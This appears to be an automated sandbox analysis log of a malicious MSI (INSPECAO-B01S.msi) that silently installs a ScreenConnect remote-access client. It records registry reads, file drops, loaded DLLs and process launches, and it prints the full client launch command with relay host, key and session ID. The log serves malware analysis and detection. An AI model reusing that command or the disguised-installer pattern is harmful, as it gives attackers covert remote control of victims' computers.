Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior

Contains functionality to launch a process as a different user

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_05F32280 CreateProcessAsUserW,

6_2_05F32280

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1432.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{87BA6F17-ED48-2213-B0B4-DE77D334918D}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15E7.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1608.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17AE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1434.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1434.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{87BA6F17-ED48-2213-B0B4-DE77D334918D}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{87BA6F17-ED48-2213-B0B4-DE77D334918D}\DefaultIcon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{87BA6F17-ED48-2213-B0B4-DE77D334918D}.SchedServiceConfig.rmi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\cksz2bob.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\cksz2bob.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\blegu5ad.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\blegu5ad.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\0hs00sh4.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\0hs00sh4.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\hfe01imn.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\hfe01imn.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\jfhfu5lw.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\jfhfu5lw.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\3mrf34qd.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\3mrf34qd.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\rs24xzl1.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\rs24xzl1.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\1ot0kljn.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\1ot0kljn.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\qf3laj4y.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\qf3laj4y.newcfg	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI1608.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_057285B0	6_2_057285B0
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572A6F8	6_2_0572A6F8
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572A6F8	6_2_0572A6F8
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F30040	6_2_05F30040
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F30040	6_2_05F30040
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B412302	7_2_00007FFD9B412302
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B40703D	7_2_00007FFD9B40703D
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71701B	7_2_00007FFD9B71701B
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71901C	7_2_00007FFD9B71901C
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B710428	7_2_00007FFD9B710428
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7236BD	7_2_00007FFD9B7236BD
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B716961	7_2_00007FFD9B716961
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7213E0	7_2_00007FFD9B7213E0
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71AEFD	7_2_00007FFD9B71AEFD
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B72131C	7_2_00007FFD9B72131C
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7209F2	7_2_00007FFD9B7209F2

Sample file is different than original file name gathered from version info

Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs INSPECAO-B01S.msi
Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenameSfxCA.dllL vs INSPECAO-B01S.msi
Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenamewixca.dll\ vs INSPECAO-B01S.msi

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal72.evad.winMSI@15/71@3/2

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: INSPECAO-B01S.msi

Static file information: TRID: Microsoft Windows Installer (60509/1) 57.88%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\INSPECAO-B01S.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B0D9CA4E13447273575F5AF2A2A458A C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9498291156A768CDF30C7CBD1AD63E0B
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A9BFA3C15C3C22AD10EB69C2707C2272 E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-xkznvd-relay.screenconnect.com&p=443&s=e3b17808-f02f-4082-a0ad-0ef89097505d&k=BgIAAACkAABSU0ExAAgAAAEAAQBhw2Nfb6ZuPKlEDIhhDVtAYuyd858SiHfXVlo7oudUHFIakFl%2fPS5vluFfI688c%2ffI5cXvCjgFShXpqsjscRe%2bvZHKSRm%2bteuE97Q6NBZ5oegi61HDzK9%2bJY6drnQvjn5O3W4R13ZtTHxRqVi92KIEihsQur1J2%2fL4Cjo7mR%2bTf3z2FvvhBA9AI44ir3hX7T6YCeKwSXIGWSjwulU6qmSUa0YOa6ak5ubRKh%2fug0gS3wbeTgSuaLTj1hdcHea2xRvqMqyIWF1MOawExDdmH4KtYMuNWGxsLao6ChTQtObulDnOQ2rzUTbk681GAIKtEvzer9DayT7dfK5gHsogR7Cx&c=envioparaiba20%2f10&c=&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe" "RunRole" "fedb95f0-928e-4923-97ab-510c95cfca5c" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B0D9CA4E13447273575F5AF2A2A458A C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9498291156A768CDF30C7CBD1AD63E0B	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A9BFA3C15C3C22AD10EB69C2707C2272 E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe" "RunRole" "fedb95f0-928e-4923-97ab-510c95cfca5c" "User"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
